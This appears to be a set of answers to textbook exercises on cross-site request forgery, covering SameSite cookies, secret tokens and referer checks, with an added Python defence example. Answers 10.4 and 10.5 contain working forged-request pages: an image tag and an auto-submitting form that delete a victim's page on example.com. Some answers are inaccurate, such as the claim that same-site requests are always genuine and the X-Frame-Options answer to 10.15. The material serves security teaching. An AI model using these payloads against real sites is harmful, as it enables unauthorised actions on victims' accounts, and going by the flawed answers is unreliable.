10.1. Explain why the same-site cookie can help prevent CSRF attacks.
A same-site cookie carries a special attribute, SameSite, set by the server. If this attribute is present and its value is Strict, the browser will not send the cookie along with cross-site requests. The server can detect that the cookie is missing and choose not to respond, or return an error, which prevents the attack.
10.2. Explain how a website can use a secret token to prevent CSRF attacks, and why it works.
The token is generated by the server, hidden in the page, and sent along with the request. A request forged by a malicious website either carries no token or carries the wrong one.
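The two defences from 10.1 and 10.2 side by side, as an added example (not from the original exercises): a SameSite=Strict session cookie and a per-session secret token that the delete handler checks before acting. Function and field names (start_session, handle_delete, csrf_token) are assumptions for the illustration.

```python
import hmac
import secrets
from typing import Dict, Tuple

# Added example (not part of the original page). Server-side session
# store: session id -> anti-CSRF token. Names are illustrative.
_SESSIONS: Dict[str, str] = {}


def start_session() -> Tuple[str, str]:
    """Create a session; return (session_id, value for the Set-Cookie header)."""
    sid = secrets.token_urlsafe(32)
    _SESSIONS[sid] = secrets.token_urlsafe(32)
    # SameSite=Strict: the browser omits this cookie on cross-site requests (10.1).
    header = f"session={sid}; Secure; HttpOnly; SameSite=Strict; Path=/"
    return sid, header


def render_delete_form(sid: str, pageid: int) -> str:
    """Embed the per-session token as a hidden field, as in 10.2."""
    token = _SESSIONS[sid]
    return (
        '<form method="post" action="/delete.php">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        f'<input type="hidden" name="pageid" value="{pageid}"></form>'
    )


def handle_delete(cookies: Dict[str, str], body: Dict[str, str]) -> int:
    """Return an HTTP status: 200 if the request is accepted, 403 if rejected."""
    expected = _SESSIONS.get(cookies.get("session", ""))
    if expected is None:
        return 403  # no valid session cookie (e.g. SameSite=Strict withheld it)
    supplied = body.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed via timing.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403  # a cross-site page cannot read the token, so it is absent or wrong
    return 200


def demo() -> Tuple[int, int, int]:
    """Legitimate request, forged request with cookie but no token, cookie withheld."""
    sid, _ = start_session()
    render_delete_form(sid, 5)                 # page served to the logged-in user
    token = _SESSIONS[sid]
    legit = handle_delete({"session": sid}, {"pageid": "5", "csrf_token": token})
    forged = handle_delete({"session": sid}, {"pageid": "5"})   # attacker page lacks token
    blocked = handle_delete({}, {"pageid": "5"})                # SameSite=Strict: no cookie
    return legit, forged, blocked
```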
10.3. These days, most of the websites use HTTPS, instead of HTTP. Do we still need to worry about CSRF attacks?
HTTPS only encrypts the communication between client and server; it offers almost no way to tell where a request comes from, so CSRF attacks remain possible even against HTTPS sites.
10.4. Using LiveHTTPHeader, we find out that the following GET request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).
http://www.example.com/delete.php?pageid=5
GET /delete.php?pageid=5
Host: www.example.com
...
Please construct a simple malicious web page, so when a victim visits this web page, a forged request will be launched against www.example.com to delete a page belonging to the user.
<html>
  <body>
    <h1>task</h1>
    <img src="http://www.example.com/delete.php?pageid=5" alt="image" width="1" height="1">
  </body>
</html>
10.5. Using LiveHTTPHeader, we find out that the following POST request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).
http://www.example.com/delete.php
POST /delete.php HTTP/1.1
Host: www.example.com
...
Content-Length: 8
pageid=5
Please construct a simple malicious web page, so when a victim visits this web page, a forged request will be launched against www.example.com to delete a page belonging to the user.
<html>
  <body>
    <script type="text/javascript">
      function forge_post() {
        // hidden field carrying the same body as the observed POST: pageid=5
        var fields = "<input type='hidden' name='pageid' value='5'>";
        var p = document.createElement("form");
        p.action = "http://www.example.com/delete.php";
        p.innerHTML = fields;
        p.method = "post";
        document.body.appendChild(p);
        p.submit();
      }
      window.onload = function() { forge_post(); };
    </script>
  </body>
</html>
10.6. The forged HTTP request against Elgg in this chapter needs Boby’s user id (guid) to work properly. If Alice targets Boby specifically, before the attack, she needs to find ways to get Boby’s user id. Alice does not know Boby’s Elgg password, so she cannot log into Boby’s account to get the information. Please describe how Alice can find out Boby’s user id.
To obtain the victim's user id, Alice can add Boby as a friend, observe the request that is sent, and analyse it to find Boby's user id.
10.7. In a request, there is a user id, which is a random number generated by the server. The ID information can be found from the user's page on the server. If an attacker does not know this user ID, can he/she still launch a CSRF attack on this service?
No. It is impossible to read the content of another page, so without knowing the id the attacker cannot send the forged request.
10.8. Suppose Alice would like to launch the attack on anybody who visits her malicious web page. In this case, she does not know who is visiting the web page beforehand. (1) Can she still launch a CSRF attack to modify the victim's Elgg profile? Please explain. (2) Can she launch a CSRF attack to add herself to the victim's friend list? Please explain.
(1) Yes: the cookie is submitted automatically.
(2) Yes: the request only needs to contain Alice's id, and the cookie is submitted automatically.
10.9. When a web page sends a request to its server, the session ID is always attached in the cookie section of the HTTP header. A web application requires all the requests from its own page to also attach the session ID in its data part (for GET requests, the session ID is attached in the URL, while for POST requests, the session ID is included in the payload). This sounds redundant, because the session ID is already included in the request. However, by checking whether a request has the session ID in its data part, the web server can tell whether a request is a cross-site request or not. Please explain why.
Because of the same-origin policy: a page from a different origin cannot read another origin's cookies. Only a same-site page can access the cookie, obtain the session id from it, and attach it to the request.
10.10. Do browsers know whether an HTTP request is cross-site or not?
The browser knows which page a request comes from and which site it is sent to. By checking that the two are not in the same domain, the browser can tell whether the request is cross-site.
10.11. Do servers know whether an HTTP request is cross-site or not?
It depends on how the server is written. If the server embeds a special token in each page and expects that token as part of the request, then the presence or absence of the token tells the server whether the request is same-site or cross-site.
10.12. Why cannot a web server use the referer header to tell whether a request is cross-site or not?
Because many browsers remove the referer header before sending a request to the server, in order to respect the user's privacy.
10.13. Why is it important for a server to know whether a request is cross-site or not?
Because cross-site requests can be forged, whereas same-site requests are always genuine.
10.14. Can we simply ask browsers not to attach any cookie for cross-site requests?
No; there are many legitimate uses of cross-site requests. For example, your facebook.com credentials can be used to log in to instagram.com. If the browser did not attach cookies, this authentication could never work.
10.15. Suppose a page from www.example.com contains an iframe, inside which a facebook page is displayed. If a request is sent from inside the iframe, is it considered a cross-site request or not? If not, how can this be secured?
A request from inside the iframe is not considered a cross-site request. This can be secured using the X-Frame-Options header, which can be set to deny, sameorigin, or allow-from. The first two are self-explanatory; the last takes a list of sites that are allowed to place the page in an iframe.